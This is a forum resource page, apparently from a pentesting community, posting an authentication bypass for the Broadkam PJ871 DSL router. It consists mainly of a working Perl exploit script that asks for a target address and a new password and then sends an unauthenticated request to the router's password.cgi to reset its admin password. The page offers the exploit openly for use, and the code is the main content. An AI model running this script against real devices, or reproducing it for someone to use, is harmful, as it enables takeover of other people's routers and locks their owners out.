Broadkam PJ871 Authentication Bypass 1.0

Authentication Bypass

Watchers:
This resource is being watched by 19 members.
  1. Mr. Penguin
    The Broadkam PJ871 DSL router does not authenticate password change requests. Broadkam is a knock-off Chinese vendor.

    Code:
    Select All
    #!/usr/bin/perl #d3c0der use HTTP::Request; use LWP::UserAgent; print "= Target : "; $ip=<STDIN>; chomp $ip; print "= new password : "; $npass=<STDIN>; chomp $npass; if ( $ip !~ /^http:/ ) { $ip = 'http://' . $ip; } if ( $ip !~ /\/$/ ) { $ip = $ip . '/'; } print "\n"; print "->attacking , plz wait ! : $ip\n"; @path1=("password.cgi?sysPassword=$npass"); foreach $ways(@path1){ $final=$ip.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); } print "[-] password changed to $npass \n";
  • About Us

    We are a community mixed with professionals and beginners with an interest in wireless security, auditing and pentesting. Feel free to check out and upload resources.


    You can also find us on: Twitter and Facebook

  • Donate to Us

    Did you find our forums useful? Feel free to donate Bitcoin to us using the form below. Those who donate the equivlent of $10 USD or more will be upgraded to VIP membership. Don't have Bitcoin? Use your credit card to GO VIP here. Don't want to fork out some coin? There are other ways to GO VIP. Bitcoin: 1LMTGSoTyJWXuy2mQkHfgMzD7ez74x1Z8K